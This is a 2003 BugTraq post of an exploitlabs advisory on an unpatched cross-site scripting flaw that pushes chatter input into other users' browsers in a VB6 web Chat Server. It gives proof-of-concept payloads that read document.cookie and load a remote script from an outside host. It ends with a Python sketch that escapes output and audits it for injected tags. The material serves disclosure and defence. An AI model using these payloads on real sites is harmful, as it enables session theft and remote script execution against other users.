BugTraq
Chatserver - XSS ( push ) Aug 09 2003 11:19PM
morning_wood (se_cur_ity hotmail com)
------------------------------------------------------------------
- EXPL-A-2003-019 exploitlabs.com Advisory 019
------------------------------------------------------------------
-= CHAT SERVER =-

exploitlabs
Aug 08, 2003

Product:
--------
Chat Server ( by author of "Sleuth 1.4" )
http://sandsprite.com/codestuff.asp

download and vb6 sources:

http://sandsprite.com/CodeStuff/chatserver.zip

Vulnerability(s):
-----------------
XSS ( push through )

Description of product:
-----------------------
Web browser based chatserver similar
to the Magma Chatserver that powers huge
sites like chatropolis.com. This will show
just how they can stream text into a browser
and display it realtime. Have an unlimited
number of people all chatting at once using
only their web browsers :) pretty neat

chatserver is a server application
and runs by default on port 80

note: chatropolis.com is not affected

VULNERABILITY / EXPLOIT
=======================

XSS is able to be "pushed" from one
chatter to another, with the results being
"forced" into any other chatters browser
for execution.

examples:

<script>alert("You are vunerable to xss ")</script>

<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>

<iframe src="http://whatismyip.com"></iframe>

<script language="JavaScript"
src="http://www.astalavista.com/backend/news.js"
type="text/javascript"></script>

note: the last one is remote code.

the vulnerability exists in the sample provided and after compiling from
the provided sources.

Local:
------
yes

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
Concurrent with this advisory
dzzie (at) yahoo (dot) com

Credits:
--------

Donnie Werner
morning_wood (at) e2-labs (dot) com
http://e2-labs.com
http://exploitlabs.com

original advisory may be obtained at
http://exploitlabs.com/files/advisories/EXPL-A-2003-019-chatserver.txt
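
Added example, not part of the original advisory and not the Chat Server's own VB6 code: a Python sketch of the "push through" behaviour next to an output-encoded version, with a parser-based check that no chatter-supplied element reaches other browsers. The `<b>nick:</b> message<br>` line template and all function names are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: the four payloads quoted in the advisory.
PAYLOADS = [
    '<script>alert("You are vunerable to xss ")</script>',
    '<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>',
    '<iframe src="http://whatismyip.com"></iframe>',
    '<script language="JavaScript" src="http://www.astalavista.com/backend/news.js" '
    'type="text/javascript"></script>',
]

# Hypothetical template: the only tags the server itself emits per chat line.
SERVER_TAGS = {"b", "br"}


def render_unsafe(nick, msg):
    """Behaviour the advisory describes: chatter input is streamed verbatim."""
    return "<b>" + nick + ":</b> " + msg + "<br>\n"


def render_safe(nick, msg):
    """Encode every chatter-controlled field before it enters the HTML stream."""
    return "<b>%s:</b> %s<br>\n" % (html.escape(nick, quote=True),
                                    html.escape(msg, quote=True))


class TagAudit(HTMLParser):
    """Records each start tag an HTML parser sees in a streamed chunk."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(chunk):
    """Return the tags in chunk that did not come from the server template."""
    audit = TagAudit()
    audit.feed(chunk)
    audit.close()
    return [t for t in audit.tags if t not in SERVER_TAGS]


if __name__ == "__main__":
    for p in PAYLOADS:
        print(injected_tags(render_unsafe("guest", p)), injected_tags(render_safe("guest", p)))
```

The same audit can be run in a regression test over every field the server echoes to other chatters, including the nickname.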
